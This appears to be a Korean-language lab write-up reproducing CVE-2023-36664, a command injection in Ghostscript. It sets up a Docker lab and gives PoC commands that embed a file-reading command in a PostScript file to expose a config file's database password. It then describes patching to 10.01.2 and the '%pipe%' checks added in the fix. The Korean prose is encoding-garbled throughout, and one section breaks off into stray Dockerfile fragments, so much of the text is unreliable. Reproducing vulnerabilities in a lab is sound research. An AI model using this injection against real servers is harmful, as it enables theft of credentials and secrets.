Share
## https://sploitus.com/exploit?id=BAC67664-3433-5AD2-8F3E-35D5F2419967
# CVE-2023-36664: Ghostscript Remote Code Execution
## ์ทจ์ฝ์ ์์ฝ
**CVE ID:** CVE-2023-36664
**์ ํ:** Ghostscript ( /var/www/html/config.php
RUN useradd -m -s /bin/bash test
WORKDIR /home/test
USER test
CMD ["/bin/bash"]
```
#### ๊ธฐ๋ณธ apt install
๊ธฐ๋ณธ์ ์ธ poc ํ๊ฒฝ์ ๊ตฌ์ฑํ๊ธฐ ์ํด์๋ Ghostscript ์ทจ์ฝ ๋ฒ์ ์ ๊ฐ์ ธ์ค๊ธฐ ์ํ wget, tar.gz ์์ถ์ ํผ ์ดํ source๋ฅผ ์ค์นํ๊ธฐ ์ํ build-essential, .ps ์คํ์ ์
์์ ์ผ๋ก ๋์ธ ๋ฉ๋ชจ์ฅ(gedit) ๋ฑ์ด ์๋ค.
#### Ghostscript 10.01.1 ์ค์น


Ghostscript ์ทจ์ฝ ๋ฒ์ 10.01.1์ git์์ source๋ฅผ ๊ฐ์ ธ์์ ์ค์นํ์๋ค. `RUN ./configure && \ make && \ make install`๋ source ๋ค์ด๋ฐ์ ํด๋์ ์ฌ์ฉ๋ฒ์ด ์ ํ์์ด ๋ฐ๋ผ์ ์ค์นํ ๊ฒ์ด๋ค.
#### ํ์ทจํ ์ ๋ณด
๋ณดํต /var/www/html/config.php์๋ ์น ์ ํ๋ฆฌ์ผ์ด์
์ ํต์ฌ ์ค์ ๊ฐ๋ค์ด ๋ค์ด๊ฐ๋ค. ์๋ฅผ ๋ค๋ฉด ๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ, ๋น๋ฐ๋ฒํธ
๊ทธ๋์ ์์๋ก DB ๋น๋ฐ๋ฒํธ๋ฅผ ํ์ทจํ๋ค๊ณ ์๊ฐํ๊ณ config.php ํ์ผ์ ์์ฑํ๋ค.
#### ์ผ๋ฐ ๊ณ์ ์์ฑ
root ๊ณ์ ์ด ์๋ ์ผ๋ฐ ๊ณ์ test๋ก poc๋ฅผ ํ ์์ ์ด๊ธฐ ๋๋ฌธ์ ์๋ก์ด user๋ฅผ ์์ฑํด์ค๋ค.
---
## ์ฌํ ์ ์ฐจ
### 1. ํ๊ฒฝ ๊ตฌ์ถ
```bash
# Docker ์ด๋ฏธ์ง ๋น๋
docker compose -f docker-compose.yml up -d
# ์ปจํ
์ด๋ ์คํ
docker exec -it cve_lab bash
```
### 2. PoC ํ์ผ ์์ฑ
์ปจํ
์ด๋ ๋ด์์:

```bash
python3 poc.py -p "gedit /var/www/html/config.php" -m r -f test
```
**์์ฑ ๊ฒฐ๊ณผ:**

์
๋ ฅํ๋ ์
์ฑ ๊ฒฝ๋ก๊ฐ .ps ์์ ์ ๋ค์ด๊ฐ ์๋ ๊ฒ์ ๋ณผ ์ ์๋ค.
### 3. Ghostscript๋ก ์
์์ ํ์ผ ์ฒ๋ฆฌ
```bash
gs -dNOSAFER test.ps
```

### 4. ๊ฒฐ๊ณผ ํ์ธ
gedit๊ฐ ์๋์ผ๋ก ์ด๋ฆฌ๋ฉฐ `/var/www/html/config.php` ๋ด์ฉ์ด ๋
ธ์ถ๋๋ค.
```
DB_PASSWORD=SuperSecret1234!!!
```
---
## ๋์ ๋ฐฉ์

### 1. ๋ณด์ ํจ์น ์ ์ฉ ๋ฐ ์
๋ฐ์ดํธ
๊ณต์์ ์ผ๋ก ์ทจ์ฝ์ ์ด ์์ ๋ Ghostscript 10.01.2 ์ด์ ์ต์ ๋ฒ์ ์ผ๋ก ์
๋ฐ์ดํธ๋ฅผ ์ํํด์ผ ํ๋ค.
### 2. ํจ์น ์์ค์ฝ๋ ๋ถ์์ ํตํ ๋ฐฉ์ด ๋ฉ์ปค๋์ฆ ์ดํด
๊ณต์ ํจ์น์์๋ `gp_validate_path_len()` ํจ์ ์์์ `gp_file_name_reduce()`๋ฅผ ํธ์ถํ๊ธฐ ์ ์ ๊ฒ์ฆ์ ํ๋ ๋ก์ง์ด ์ถ๊ฐ๋์๋ค.
ํ์ดํ ํน์ ๋ฌธ์์ด ์์ธ ์ฒ๋ฆฌ ๋ฐ ์ฐจ๋จ ๊ฐ์ : ์
๋ ฅ ๊ฒฝ๋ก์ ์ ๋์ฌ๊ฐ %pipe% ๋๋ | ๊ธฐํธ๋ก ์์ํ๋ ๊ฒฝ์ฐ๋ฅผ ๋ณ๋๋ก ์๋ฒฝํ๊ฒ ๊ฐ์งํ๋ ๋ถ๊ธฐ๋ฌธ์ด ์ถ๊ฐ๋์๋ค.
๊ณต์ ํจ์น ๋ฒ์ : https://github.com/ArtifexSoftware/ghostpdl/commit/5f56c6f6f989816fc9cc671116740acecbed5b6c
## ์ฐธ๊ณ ์๋ฃ
- **CVE ๊ณต์ ํ์ด์ง:** https://vulners.com/cve/CVE-2023-36664
- **CVE ์ดํด:** https://www.vicarius.io/vsociety/posts/cve-2023-36664-command-injection-with-ghostscript
- **PoC ์ฌํ:** https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection
---